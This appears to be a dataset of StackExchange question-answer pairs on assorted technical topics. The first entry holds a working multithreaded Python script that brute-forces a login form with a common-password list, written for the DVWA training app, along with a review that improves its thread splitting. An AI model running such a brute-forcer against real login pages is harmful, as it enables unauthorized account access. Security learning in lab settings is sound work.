anchor stringlengths 0 150 | positive stringlengths 0 96k | source dict |
|---|---|---|
Multithreaded password cracker | Question: I am learning infosec with DVWA (Damn Vulnerable Web Application). At first I decided to write something to brute-force the admin login screen. I've downloaded a list of the most commonly used passwords and created a script which takes them and attempts to log in. What do you think of it, and what could be improved?
#!/usr/bin/env python3
import threading
import requests
URL = 'http://localhost/login.php'
PASSWORD_FILE_NAME = 'common-passwords.txt'
entry_found = False
def create_threads(passwords):
password_list_split_points = [
(0, len(passwords) // 4),
(len(passwords) // 4 + 1, len(passwords) // 2),
(len(passwords) // 2 + 1, 3 * (len(passwords) // 4)),
(3 * (len(passwords) // 4) + 1, len(passwords) - 1),
]
thread_list = [threading.Thread(
target=run_cracker,
args=(
passwords[split_point[0] : split_point[1]]
)
) for split_point in password_list_split_points]
return thread_list
def run_cracker(*passwords):
global entry_found
for password in passwords:
if entry_found:
break
# Passwords still contain last \n char which has to be stripped.
if crack_password(password.rstrip()):
# This is set to True only once. No need for sync mechanisms.
entry_found = True
def crack_password(password):
print('[*] Trying password: "{}" ...'.format(password))
response = requests.post(
URL,
data={'username': 'admin', 'Login': 'Login', 'password': password}
)
if bytes('Login failed', encoding='utf-8') not in response.content:
print('[*] Login successful for username: {} password: {}'.format(
'admin', password
))
return True
else:
return False
if __name__ == '__main__':
with open(PASSWORD_FILE_NAME) as password_file:
passwords = password_file.readlines()
thread_list = create_threads(passwords)
for thread in thread_list:
print('[*] Running thread: {}.'.format(thread.getName()))
thread.start()
for thread in thread_list:
print('[*] Wating for {} to join.'.format(thread.getName()))
thread.join()
Answer: Recommendations
Right now the create_threads function is skipping passwords and is hard-coded to only work with four threads. I'll go over ways to fix both of these issues.
The password skipping occurs because the end index of a Python slice is exclusive.
For example:
n = 100
a = list(range(n))
b = a[0 : n // 4]  # equals [0, 1, ..., 23, 24]
c = a[n // 4 + 1 : n // 2]  # equals [26, 27, ..., 48, 49]
Notice that a[25] is being skipped. You can fix this by slicing a in the following way: [a[i : i + n // 4] for i in range(0, n, n // 4)]
The problem is that this solution assumes that n % 4 == 0. Or, to bring it back to your code, that len(passwords) % 4 == 0. In the code below we can fix this issue by keeping track of the value of the modulus operation in the variable m. If m != 0 then we can replace the last list (in our list of password slices, xs) with the appropriate slice.
Fortunately all of this makes it easier to replace the hard-coded thread number with a variable (t in the code below).
Code
def create_threads(t, passwords):
n = len(passwords)
x = n // t
m = n % t
xs = [passwords[i:i+x] for i in range(0, n, x)]
if m:
xs[t-1:] = [passwords[-m-x:]]
assert(sum([len(l) for l in xs]) == n)
return [
threading.Thread(target=run_cracker, args=(l)) for l in xs
] | {
"domain": "codereview.stackexchange",
"id": 28276,
"tags": "python, python-3.x, multithreading, security"
} |
training when Multiple labels per image | Question: I have multiple labels per image. Is it better to train taking each label separately, or should I mark all the labels present as 1 in the same image? Which method is better? I will be using a CNN architecture.
Answer: Assuming you want to classify the images (and not use bounding boxes to locate classes within each image), a common way is to create a target vector for each image, which holds the information regarding all classes and is what the model would eventually predict.
If you have a dataset with, say 5 classes, and your first example image contains classes 1 and 4, you would create your target vector for that image to be:
example_sample = ... # your image array
example_sample_y = [1, 0, 0, 1, 0]
This is a kind of one-hot encoding, as the vector has a placeholder for each of the 5 classes, but only a 1 when the class is present.
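As a minimal sketch (the helper name and five-class setup are illustrative, not from any particular library), building such multi-hot target vectors could look like this:

```python
# Build multi-hot target vectors for multi-label image classification.
# The class count and label indices below are hypothetical examples.
NUM_CLASSES = 5

def to_multi_hot(labels, num_classes=NUM_CLASSES):
    """Return a target vector with a 1 at each present class index."""
    target = [0] * num_classes
    for label in labels:
        target[label] = 1
    return target

# An image containing classes 1 and 4 (1-based, as in the example above),
# expressed with 0-based indices:
example_sample_y = to_multi_hot([0, 3])
print(example_sample_y)  # [1, 0, 0, 1, 0]
```

With frameworks such as Keras or PyTorch you would typically pair such targets with a sigmoid output layer (one unit per class) and a binary cross-entropy loss.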
Have a look at this high-level walkthrough.
As for your other suggestion, of training on the same image multiple times with a different label each time:
You want to learn some kind of joint probability between the classes, and in my opinion, training on the same image with different outcomes (e.g. the sample image above twice, producing either a 1 or a 4) will not only be very inefficient during training, but will also be mathematically confusing. The same input can give 2 possible outputs! This implies your underlying function that maps images to classes is not well-defined. That isn't usually a good thing! | {
"domain": "datascience.stackexchange",
"id": 3963,
"tags": "deep-learning, cnn"
} |
multi-threaded rospy.get_param() crashes: CannotSendRequest and ResponseNotReady | Question:
Hi all,
I work with the sushi repository from the ICRA Mobile Manipulation Challenge.
When instantiating the ArmMover I get "CannotSendRequest" and "ResponseNotReady" exceptions. The ArmMover class creates multiple ArmMoverWorker, which run their own threads. The reason for the crash seems to be requests to the parameter server from multiple threads.
Can the parameter server process multiple requests from different threads running on the same node?
As a workaround I moved the parameter requests into the constructor of the ArmMoverWorker (before the thread is started) and then it works fine.
Originally posted by Andy on ROS Answers with karma: 31 on 2012-06-19
Post score: 2
Original comments
Comment by dornhege on 2012-06-21:
Can anyone else using the Sushi code verify this? Running move_arms_to_side.py with simulation causes this.
Answer:
To me this looks like a bug in rospy. You should probably file a ticket at https://code.ros.org/trac/ros/.
Originally posted by Lorenz with karma: 22731 on 2012-06-19
This answer was ACCEPTED on the original site
Post score: 0 | {
"domain": "robotics.stackexchange",
"id": 9847,
"tags": "ros, rospy, multi-thread, parameter-server"
} |
Light (Photon) reflecting from an accelerated mirror | Question: Are there well-known formulas (or some articles) from general relativity for how a photon's (light's) frequency changes while reflecting from an accelerated mirror?
I suspect it should differ from reflection off a mirror moving with constant speed, because an accelerated mirror is a non-inertial reference frame, and general relativity is applicable in that case.
UPDATE 1
After some comments, I want to clarify the question. What will happen in the picture below? Let's say I have a harmonically oscillating mirror x(t) = Sin(t) on my desk. The blue line is the mirror, red/orange circle is a photon. I put values of coordinate x, speed v and acceleration a on top of the image.
At the point x=1, v=0 and a=1. It may look strange: how can v=0 while a is not zero? But it is the same as when we throw a stone up. Acceleration is always g, but at the top point, speed is zero. At this point where x=1, v=0, a=1 the photon is falling on the mirror.
The question is what will happen with photon frequency from my side (if this oscillating mirror is on my desk)? What will I see?
I change colour from red to orange (blueshift), because I assumed that the acceleration direction is from right to left, which means the fictitious force is in the opposite direction, which is equivalent to a gravitational force from left to right, and the photon is reflecting towards the source of the gravitational force (towards the source of gravity). Or is that not correct? Maybe I will not see any changes, and all changes will be visible only to an observer on the mirror?
Also what if the photon hits the mirror when speed is not zero and acceleration is not zero? Will I see only Doppler shift or something different?
Of course, I understand, that in real life with the real oscillating mirror on the desk with any achievable speed any difference in frequency will be undetectable, but I just want to know theoretically with the assumption, that I can detect very very small changes in frequency.
Answer: If we assume the plane of the mirror is perpendicular to the acceleration, the situation is the same as the situation where the mirror is (horizontally) at rest in a gravitational field. When a photon (moving downwards) approaches the mirror its frequency increases. The moment the photon hits the mirror its (vertical) direction is reversed but its frequency doesn't change. After the reflection, the photon's frequency decreases while travelling upwards. These three processes, into which I divided up the total process, each conserve the energy ($\frac{hc}{\lambda}$) of the photon.
See this article for the change in frequency of the light. | {
"domain": "physics.stackexchange",
"id": 59398,
"tags": "general-relativity, visible-light, photons, acceleration"
} |
Messing with the past: Endless loop, or alternate timelines? | Question: Let's take the following scenario:
A person finds a time machine. He uses it to travel to the past, and
kills his grandparents. Now because of this, his parents are never
born, they do not meet, and he himself ceases to exist.
I have heard one predominant result of this murder:
Since he killed his grandparents, he doesn't exist. Therefore, he
could not have gone into the past and committed the murders.
Therefore, he exists. Therefore, he doesn't exist and so on, ad
infinitum.
However, I think that instead of an endless loop, we would end up with an altered timeline:
Since the grandparents are dead, they no longer exist. Anything they
might have done to the world in the normal timeline after their deaths
doesn't happen. Time moves on, and we come to the present day. There
is no boy, no parents, no grandparents. The loop doesn't happen,
because the grandparents are already dead. It doesn't matter that the
boy isn't there to kill them again.
So which would be a more accurate expectation? Or is there a third option that I'm missing completely?
I am looking for answers from a purely physics perspective.
Answer:
which would be a more accurate expectation?
Since this is a Physics Q&A forum, we should approach this question from the perspective of Physics.
Until you have a hypothesis for the mechanism by which matter can be instantaneously moved from one point in time to a prior point in time, you have nothing on which to base predictions.
So far as I know, there is a maximum speed that we can move through spacetime. If I were to move backwards in time, at the very least I would expect to gradually get smaller and younger, to know less and have my memories slowly evaporate. | {
"domain": "physics.stackexchange",
"id": 4788,
"tags": "waves, time-travel"
} |
Method to extract closed curve from 3D CAD into CSV or TXT | Question: I have engineering data emerging from more or less complex constructions.
On a regular basis I need outlines from construction data to perform geometric calculations on them. The construction data comes from different CAD packages (e.g. Inventor or SolidWorks). I basically need certain closed polygons stored in a way I can read with primitive methods, like sloppily designed Perl programs.
Edit: The polygons are planar. I.e. the data I want to process is 2D. Basically it often is an outline of a 3D object, e.g. a housing.
So my favourite input format for such extracted polygon data is a CSV-file or plain text with whatever separators are available.
As most CAD-SW can import 3D-Models saved in STEP, I practically can choose which software I use to save the polygon data. The outcome is, I will probably end up having DXF or DWG files, which are the most primitive CAD-files I can get from that.
This leaves me with getting my polygons out of that goddamn DXF into a CSV file. Does anyone have an (preferably) easy way to do that?
Addendum: For increased clarification, I describe my task. I have to design PCBs which fit nicely into oddly shaped housings. While my EDA software exhibits a fairly usable routine for importing DXF data, my self-programmed autoplacer does not. So in my EDA file, I may have a nice outline, but this does not help me with placing the components inside that polygon. Hence I need the polygon data separately in my autoplacer.
Answer: It seems you are interested in a flat slice of your CAD model. While you could use a 3D file and slice it yourself, that seems like overkill, as the CAD application is perfectly capable of doing the slices for you.
quick and dirty
Ok, so each CAD has a 2D drawing mode; you can save that drawing out as DXF or PDF, both of which are easy to parse. If you don't happen to find a good tool for this, turn the PDF into SVG, which can be easier to parse. This approach can also be done quick and dirty by leveraging tools such as Inkscape or Illustrator. Let's do an example, because it's easy to do:
Image 1: Quick and dirty export drawing as pdf/svg, then isolate and read points from that file. I used a modified version of this tool to dump coordinates from the PDF. You should be able to do that in Perl easily. Data available here.
Proper Method
It is possible to access both SolidWorks and Inventor through a COM bridge, so you can access the CAD application's data model directly from your Perl code. This has several benefits, mostly not needing to parse intermediate files. You could select the relevant edges and just traverse them directly from the CAD. Now I only have access to SolidWorks at work, but a similar approach works in Inventor, as I have done it.
I had some extra time at work to write some quick VBA code for SolidWorks. The code takes all the lines of a closed sketch, sorts them into polygon order (with a naive N^2 algorithm) and prints them in the VBA debug console.
Option Explicit
Sub main()
Dim swApp As SldWorks.SldWorks
Dim swModel As SldWorks.ModelDoc2
Dim swPart As SldWorks.PartDoc
Dim swSelMgr As SldWorks.SelectionMgr
Dim swFeat As SldWorks.Feature
Dim swSketch As SldWorks.Sketch
Dim numLines As Long
Dim vLines As Variant
Dim dict As New Collection
Dim i As Variant
Set swApp = CreateObject("SldWorks.Application")
Set swModel = swApp.ActiveDoc
Set swPart = swModel
Set swSelMgr = swModel.SelectionManager
Set swFeat = swSelMgr.GetSelectedObject5(1)
Set swSketch = swFeat.GetSpecificFeature2
numLines = swSketch.GetLineCount2(1) 'Exclude crosshatch lines
vLines = swSketch.GetLines2(1) 'Exclude crosshatch lines
Dim startP, endP, line As Variant
For i = 1 To numLines - 1
line = Array(Array(vLines(12 * i + 6) * 1000, _
vLines(12 * i + 7) * 1000), _
Array(vLines(12 * i + 9) * 1000, _
vLines(12 * i + 10) * 1000))
dict.Add (line)
Next i
startP = Array(vLines(6) * 1000, _
vLines(7) * 1000)
endP = Array(vLines(9) * 1000, _
vLines(10) * 1000)
pp startP
pp endP
For i = 1 To dict.Count - 1
endP = NextPoint(dict, endP)
pp endP
Next i
End Sub
Sub pp(point As Variant)
Debug.Print " " & Str(point(0)) & ", " & Str(point(1))
End Sub
Function NextPoint(dict As Collection, point As Variant) As Variant
Dim i As Variant
For i = 1 To dict.Count
Dim data, startRP, endRP As Variant
data = dict.Item(i)
startRP = data(0)
endRP = data(1)
If endRP(0) = point(0) And endRP(1) = point(1) Then
dict.Remove (i)
NextPoint = startRP
Exit Function
End If
If startRP(0) = point(0) And startRP(1) = point(1) Then
dict.Remove (i)
NextPoint = endRP
Exit Function
End If
Next i
End Function
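For reference, the naive N^2 chaining of unordered segments into polygon order (which the VBA above does via NextPoint) can be sketched in Python; the segment data format here is hypothetical:

```python
# Chain unordered line segments [(start, end), ...] into polygon vertex order,
# mirroring the naive N^2 approach of the VBA NextPoint function above.
def chain_segments(segments):
    segments = list(segments)
    start, end = segments.pop(0)
    points = [start, end]
    while segments:
        for i, (s, e) in enumerate(segments):
            if e == points[-1]:
                s, e = e, s  # segment is oriented the other way; flip it
            if s == points[-1]:
                points.append(e)
                segments.pop(i)
                break
        else:
            raise ValueError("segments do not form a single closed chain")
    return points

# A hypothetical unit square, with segments in shuffled order and orientation:
square = [((0, 0), (1, 0)), ((1, 1), (0, 1)), ((1, 0), (1, 1)), ((0, 1), (0, 0))]
print(chain_segments(square))  # [(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)]
```

The resulting point list can then be dumped to CSV with whatever separator you prefer.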
Since VBA is calling COM, you can use nearly any language; for example, Perl implements Win32::OLE, which can do the job.
Image 2: Example part with simple one loop sketch results in this output
Epilogue
If you really want to export 3D polygon data and do the slicing manually, then I would export either OBJ or STL. But this would be way down on my list of approaches, mainly because all the other approaches are simpler. | {
"domain": "engineering.stackexchange",
"id": 1059,
"tags": "cad"
} |
Why does a substance with an endothermic heat of solution dissolve? | Question: How does a substance with an endothermic heat of solution dissolve?
Answer: Dissolution happens in three steps.
Solute-solute attractions must be broken (consumes energy, endothermic), solvent-solvent attractions must be broken (also endothermic), and finally solute-solvent attractions form. This results in a lower energy state and is exothermic.
Dissolution will be endothermic if it takes more energy to break the mentioned attractions than is released in the last step. You are asking, then: why is this reaction spontaneous? In other words, why does it occur? To find out we need chemical thermodynamics. $$\Delta G=\Delta H - T\Delta S$$
$\Delta G$ = change in Gibbs free energy for a reaction. $\Delta G<0$ = reaction is spontaneous. Otherwise it is NOT spontaneous (i.e. will not occur on its own).
$\Delta H$ = change in enthalpy. $\Delta H <0$ = reaction is exothermic. If greater than 0, the reaction is endothermic. Already we can see that an endothermic reaction makes $\Delta G$ more positive, and thus the reaction is less likely to be spontaneous.
$T$ = temperature in K.
$\Delta S$ = change in entropy. $\Delta S > 0$ = reaction leads to a state of higher entropy. Entropy describes disorder in a system. Dissolution of a solute in a solvent will always lead to a state of higher disorder, since we go from having all the solute concentrated in a cluster (more ordered) to being spread evenly throughout the solution (more disordered). We can see from the equation that if the reaction leads to higher entropy, then higher temperatures increase the likelihood that $\Delta G < 0$, making the reaction spontaneous. On the other hand, if we're going to a more ordered state, lower temperatures increase the likelihood of a spontaneous reaction.
So how do we apply this to dissolution?
You know that the dissolution reaction is endothermic. That means that $\Delta H > 0$ for this particular reaction. Yet we know that the reaction is spontaneous, since you report that it does indeed occur! This means $\Delta G < 0$. The only way to make that happen is for $\Delta S$ to be positive. So the reaction must go to a more disordered state. Since it's a dissolution, we know that it does. The solute goes from being concentrated in a cluster (ordered) to being spread throughout the solvent (disordered). Pay attention to where temperature is in the equation. It is quite easy to see that, for a dissolution reaction where $\Delta S > 0$, you can increase the chance of the reaction being spontaneous by increasing temperature!
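To make that concrete, here is a small numeric sketch; the $\Delta H$ and $\Delta S$ values are invented purely for illustration, not measured data:

```python
# Gibbs free energy for a hypothetical endothermic dissolution.
# delta_H > 0 (endothermic), delta_S > 0 (more disorder on dissolving).
delta_H = 25_000.0   # J/mol, illustrative value
delta_S = 100.0      # J/(mol*K), illustrative value

def delta_G(T):
    """Delta G = Delta H - T * Delta S, with T in kelvin."""
    return delta_H - T * delta_S

for T in (200.0, 298.0, 350.0):
    print(T, delta_G(T))
# 200 K ->   5000 J/mol (not spontaneous)
# 298 K ->  -4800 J/mol (spontaneous despite Delta H > 0)
# 350 K -> -10000 J/mol (even more so)
```

Note how raising the temperature flips the sign of $\Delta G$, exactly as the equation predicts.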
Bottom line
Your dissolution reaction is endothermic, but because dissolution reactions lead to states of higher entropy, your particular reaction is spontaneous (it occurs) at your specific temperature nonetheless! If it weren't, heating the system could make it so. | {
"domain": "chemistry.stackexchange",
"id": 326,
"tags": "heat"
} |
How is the backbone of two neural networks trained? | Question: Suppose I have a backbone network (a convolutional neural network). After this network ends, the output is fed into two neural networks, both building on the outputs of the feature extractor (CNN). Now, if I want to train this complete network from scratch on two different tasks, the weights of the layers after the backbone can be updated easily, but how should I update the weights of the backbone network? I mean, I can compute gradients with respect to the two losses; shall I take the mean of the gradients in the backbone, or should it be some weighted sum? If it is a weighted sum, then how would the parameters of the weighted sum be updated?
Thanks
Answer: In general, any sort of gradient-based learning is done on scalar functions, i.e. functions f: ℝ^n ↦ ℝ (in fact, this is what the gradient is defined for). Chiefly, to define any minimization problem, you need a single value to minimize, not more.
This means: Ultimately your loss always has to be a scalar (a single number). Combining the gradients in the middle (so before backpropping into your backbone) would ultimately be equal to just combining the losses. And a weighted loss will be easier to implement.
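A minimal sketch of that weighted combination (the weights here are arbitrary hyperparameters, and the loss values stand in for whatever per-task losses your framework computes):

```python
# Combine two task losses into one scalar before backpropagation.
# The weights are hyperparameters; these values are placeholders.
W_TASK1, W_TASK2 = 1.0, 0.5

def combined_loss(loss_task1, loss_task2, w1=W_TASK1, w2=W_TASK2):
    """Weighted sum of per-task losses -> a single scalar to minimize."""
    return w1 * loss_task1 + w2 * loss_task2

# In an autodiff framework, backpropagating this one scalar sends gradients
# from both heads into the shared backbone automatically.
print(combined_loss(0.8, 0.4))  # 1.0 * 0.8 + 0.5 * 0.4 = 1.0
```

Tuning the weights (or learning them, e.g. via uncertainty weighting) is itself a design choice; a plain weighted sum is the simplest starting point.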
For reference, you can look at this talk by A. Karpathy on how Tesla does multi-task learning on a single backbone and how they deal with combining different losses. | {
"domain": "datascience.stackexchange",
"id": 8015,
"tags": "neural-network"
} |
Rayleigh scattering and dimension of oscillator compared to wavelength | Question: Why is Rayleigh scattering suitable only for cases where the oscillator dimensions are much smaller than the incident wavelength?
Answer: That's the definition of Rayleigh scattering: it's what happens when you scatter light (or other EM waves) off of particles whose size is much smaller than the wavelength. If you have particles that are comparable to or bigger than the wavelength, then you get Mie scattering. | {
"domain": "physics.stackexchange",
"id": 42967,
"tags": "electromagnetism, scattering, diffusion"
} |
ROS inside part of a c++ project | Question:
Hi.
I have a C++ project where I'm using CMakeLists with a structure similar to:
Project (inside my ros sandbox)
|
|_Folder1
|___some code
|___CMakeLists.txt
|
|_Folder2
|___some code
|___CMakeLists.txt
|
|_ROS package folder
|___some code
|___CMakeLists.txt
|
|_CMakeLists.txt
Inside the main CMakeLists.txt I have something similar to:
add_subdirectory(recruiter)
add_library(something_static STATIC ${RECRUITER_SOURCES})
Where the "recruiter" directory is the ROS package, created using "roscreate-pkg".
And I'm getting the following error:
[rosbuild] Error from directory check: /opt/ros/groovy/share/ros/core/rosbuild/bin/check_same_directories.py /opt/ros/groovy/stacks/test/noderecruiter
1
Traceback (most recent call last):
File "/opt/ros/groovy/share/ros/core/rosbuild/bin/check_same_directories.py", line 46, in
raise Exception
Exception
CMake Error at /opt/ros/groovy/share/ros/core/rosbuild/private.cmake:102 (message):
[rosbuild] rospack found package "test" at "", but the current
directory is "/opt/ros/groovy/stacks/test/noderecruiter". You
should double-check your ROS_PACKAGE_PATH to ensure that packages are found
in the correct precedence order.
Call Stack (most recent call first):
/opt/ros/groovy/share/ros/core/rosbuild/public.cmake:177 (_rosbuild_check_package_location)
server/noderecruiter/CMakeLists.txt:12 (rosbuild_init)
-- Configuring incomplete, errors occurred!
What's happening?
Thanks.
Originally posted by Verane on ROS Answers with karma: 25 on 2013-06-24
Post score: 0
Original comments
Comment by dornhege on 2013-06-24:
Are you building with catkin? I think ROS/catkin needs the toplevel.cmake to work.
Comment by Verane on 2013-06-24:
No, I would like to build like a normal project.
Comment by allenh1 on 2013-06-24:
Could you please post your CMakeLists.txt file in full? It would be good to see the context of your build output.
Comment by Verane on 2013-06-25:
What CMakeLists do you want? The file inside the main project or the ros one?
Answer:
ROS packages are not designed to simply be included inside CMake packages. This is not a supported use case.
Originally posted by tfoote with karma: 58457 on 2013-08-12
This answer was ACCEPTED on the original site
Post score: 1 | {
"domain": "robotics.stackexchange",
"id": 14675,
"tags": "ros, c++, cmake"
} |
Javascript refactor if condition function | Question: I have this function
const rank = (totalPoints, pointsRank) => {
if (totalPoints <= pointsRank[0]) {
return ({
rank: 1,
pointsLeftForNextRank: (pointsRank[1] - totalPoints)
})
} else if (totalPoints >= pointsRank[1] && totalPoints < pointsRank[2]) {
return ({
rank: 2,
pointsLeftForNextRank: (pointsRank[2] - totalPoints)
})
} else if (totalPoints >= pointsRank[2] && totalPoints < pointsRank[3]) {
return ({
rank: 3,
pointsLeftForNextRank: (pointsRank[3] - totalPoints)
})
} else if (totalPoints >= pointsRank[3] && totalPoints < pointsRank[4]) {
return ({
rank: 4,
pointsLeftForNextRank: (pointsRank[4] - totalPoints)
})
} else if (totalPoints >= pointsRank[4] && totalPoints < pointsRank[5]) {
return ({
rank: 5,
pointsLeftForNextRank: (pointsRank[5] - totalPoints)
})
} else if (totalPoints >= pointsRank[5] && totalPoints < pointsRank[6]) {
return ({
rank: 6,
pointsLeftForNextRank: (pointsRank[6] - totalPoints)
})
} else if (totalPoints >= pointsRank[6]) {
return ({
rank: 7,
pointsLeftForNextRank: 0
})
}
}
module.exports = rank
and I call it like this
let pointsRank = [150, 500, 1000, 2000, 3500, 5000, 5500]
let totalPoints = 1200
rank(totalPoints, pointsRank)
output
{ rank: 3, pointsLeftForNextRank: 800 }
how can I improve this function? I feel like I wrote a lot of code that could be refactored into a smaller amount of code with the same functionality.
Also, I need to know whether I am violating any of the SOLID principles.
Answer: Basically, we search for the number in the array closest to our score. After we find that value, we take its index and add 1, because ranks start from 1.
//rank 1 : 150 - 500
//rank 2 : 500 - 1000
//rank 3 : 1000 - 2000
//rank 4 : 2000 - 3500
//rank 5 : 3500 - 5000
//rank 6 : 5000 - 5500
let pointsRank = [150, 500, 1000, 2000, 3500, 5000, 5500]
function rank(pointsRank, score) {
var closest = pointsRank.reduce(function(prev, curr) {
return (Math.abs(curr - score) < Math.abs(prev - score) ? curr : prev);
});
var rank = pointsRank.indexOf(closest) + 1; // cuz starts from 0 and we don't have rank 0
console.log("min range: " + closest +
" | our score: " + score +
" | max range: " + pointsRank[rank])
return {
rank: rank,
pointsLeftForNextRank: (pointsRank[rank] - score)
}
}
const test1 = rank(pointsRank, 1200);
const test2 = rank(pointsRank, 2000);
const test3 = rank(pointsRank, 3700);
console.log(test1);
console.log(test2);
console.log(test3); | {
"domain": "codereview.stackexchange",
"id": 37074,
"tags": "javascript"
} |
Rename files by editing their names in an editor | Question: Inspired by a recent question to rename files by editing the list of names in an editor, I put together a similar script.
Why: if you need to perform some complex renames that are not easy to formulate with patterns (as with the rename.pl utility), it might be handy to be able to edit the list of names in a text editor, where you will see the exact names you will get.
Features:
Edit names in a text editor
Use the names specified as command line arguments, or else the files and directories in the current directory (resolve *)
Use a sensible default text editor
According to man bash, READLINE commands try $VISUAL or else $EDITOR -> looks like a good example to follow.
Abort if cannot determine a suitable editor.
Abort (do not rename anything) if the editor exits with error
Paths containing newlines are explicitly unsupported
Perform basic sanity checks: the edited text should have the same number of lines as the paths to rename
Here's the script:
#!/usr/bin/env bash
#
# SCRIPT: mv-many.sh
# AUTHOR: Janos Gyerik <info@janosgyerik.com>
# DATE: 2019-07-27
#
# PLATFORM: Not platform dependent
#
# PURPOSE: Rename files and directories by editing their names in $VISUAL or $EDITOR
#
set -euo pipefail
usage() {
local exitcode=0
if [[ $# != 0 ]]; then
echo "$*" >&2
exitcode=1
fi
cat << EOF
Usage: $0 [OPTION]... [FILES]
Rename files and directories by editing their names in $editor
Specify the paths to rename, or else * will be used by default.
Limitations: the paths must not contain newline characters.
EOF
if [[ $editor == *vim ]]; then
echo "Tip: to abort editing in $editor, exit with :cq command."
fi
cat << "EOF"
Options:
-h, --help Print this help
EOF
exit "$exitcode"
}
fatal() {
echo "Error: $*" >&2
exit 1
}
find_editor() {
# Following READLINE conventions, try VISUAL first and then EDITOR
if [[ ${VISUAL+x} ]]; then
echo "$VISUAL"
return
fi
# shellcheck disable=SC2153
if [[ ${EDITOR+x} ]]; then
echo "$EDITOR"
return
fi
fatal 'could not determine editor to use, please set VISUAL or EDITOR; aborting.'
}
editor=$(find_editor)
oldnames=()
while [[ $# != 0 ]]; do
case $1 in
-h|--help) usage ;;
-|-?*) usage "Unknown option: $1" ;;
*) oldnames+=("$1") ;;
esac
shift
done
work=$(mktemp)
trap 'rm -f "$work"' EXIT
if [[ ${#oldnames[@]} == 0 ]]; then
oldnames=(*)
fi
printf '%s\n' "${oldnames[@]}" > "$work"
"$editor" "$work" || fatal "vim exited with error; aborting without renaming."
mapfile -t newnames < "$work"
[[ "${#oldnames[@]}" == "${#newnames[@]}" ]] ||
fatal "expected ${#oldnames[@]} lines in the file, got ${#newnames[@]}; aborting without renaming."
for ((i = 0; i < ${#oldnames[@]}; i++)); do
old=${oldnames[i]}
new=${newnames[i]}
if [[ "$old" != "$new" ]]; then
mv -vi "$old" "$new"
fi
done
What do you think? I'm looking for any and all kinds of comments, suggestions, critique.
Answer: Looks pretty good to me, and to Shellcheck too.
find_editor is quite long-winded; it could be a one-liner:
editor=${VISUAL:-${EDITOR:?could not determine editor to use, please set VISUAL or EDITOR; aborting.}}
There are a couple of Vim-isms remaining. The test if [[ $editor == *vim ]] could be generalised to a case "$editor" in … esac to support adding more editor hints, but more significantly, we have an error message that mentions vim where $editor would be more appropriate.
The current implementation is very simplistic when the new names might overlap with the old names. We might need a topological sort to perform the renames in the correct order in that case.
Perhaps it should be an error if the user asks for two or more files to be moved to the same target name? | {
"domain": "codereview.stackexchange",
"id": 43022,
"tags": "bash, shell, rags-to-riches"
} |
Clausius Inequality and Thermodynamic Potentials | Question: One statement of the Clausius inequality is
$$dS \geq \frac{\delta q}{T}$$
where $\delta q$ is the exchanged heat. My understanding is that $T$ refers to the temperature of the surroundings rather than the temperature of the system itself. This is because when deriving the Clausius inequality, we use
$$dS = dS_\text{proc} + dS_\text{exch}$$
where the total entropy change of the system is the change in entropy due to a spontaneous process plus the change in entropy due to heat exchange with the surroundings. Since the surroundings are kept in thermal equilibrium, it follows that $dS_\text{exch} = -dS_\text{surr} =\frac{\delta q}{T}$ where $T$ is the temperature of the surroundings. Since $dS_\text{proc}\geq 0$ (with equality only in the case of a reversible process), we obtain the Clausius inequality.
However, when considering thermodynamic potentials, it seems that $T$ is used to refer to temperature of the system rather than the temperature of the surroundings. For example, to derive the spontaneity criterion for Helmholtz free energy, we use
$$dA = dU - TdS - SdT = \delta q - PdV - TdS - SdT.$$
At constant $T$ and $V$, this becomes
$$dA = \delta q - TdS$$
and we use the Clausius inequality to state $dA \leq 0$. In this derivation, however, it seems that $T$ refers to the temperature of the system rather than the surroundings, so I am not sure how the Clausius inequality can be correctly applied here.
Answer: Your interpretation of the Clausius inequality is correct, and T is the temperature of the surroundings. However, your interpretation of how the Helmholtz free energy is applied is incorrect. In applying the Helmholtz free energy, we assume, for both reversible and irreversible processes on a closed system, that the surroundings are constantly maintained at the same temperature as the initial temperature of the system T throughout the process. So from the first law of thermodynamics, we have $$\Delta U=Q-W$$ and, from the 2nd law of thermodynamics, we have $$\Delta S=\frac{Q}{T}+\sigma$$ where $\sigma$ is the generated entropy. If we combine these two equations, we obtain: $$\Delta U=T\Delta S-T\sigma-W$$or, under these constant external temperature conditions, $$\Delta A=-W-T\sigma$$or$$W=-\Delta A-T\sigma$$So, for a given pair of end states, the maximum work that the system can do is for a reversible path, and is equal to $-\Delta A$. For irreversible paths between the same two end states, the work is less than for the reversible path. Again, all this applies only to cases where the surroundings are maintained at the same temperature as the initial temperature of the system. | {
"domain": "physics.stackexchange",
"id": 99990,
"tags": "thermodynamics, entropy"
} |
Hello guys, has anyone used the evaluation scripts provided in RGBDSLAM_v2 with the .bag files obtained directly from the package GUI? | Question:
I'm trying with this command: ./run_tests.sh [rgbd_dataset_freiburg1_xyz.bag]
And I got this:
[rospack] Error: package 'rgbdslam' not found
Evaluating ORB
Will evaluate RGBD-SLAM on the following bagfiles:
ORB_home_newcalibpar.bag rgbd_dataset_freiburg1_desk.bag rgbd_dataset_freiburg1_xyz.bag
[rospack] Error: package 'rgbdslam' not found
14:34:31 Results for ORB_home_newcalibpar are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/ORB_home_newcalibpar
14:34:33 Finished processing ORB_home_newcalibpar
mv: cannot stat ‘ORB_home_newcalibpar.bag?’: No such file or directory
cp: cannot stat ‘ORB_home_newcalibpar-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:34:33 Results for rgbd_dataset_freiburg1_desk are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_desk
14:34:33 Finished processing rgbd_dataset_freiburg1_desk
mv: cannot stat ‘rgbd_dataset_freiburg1_desk.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_desk-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
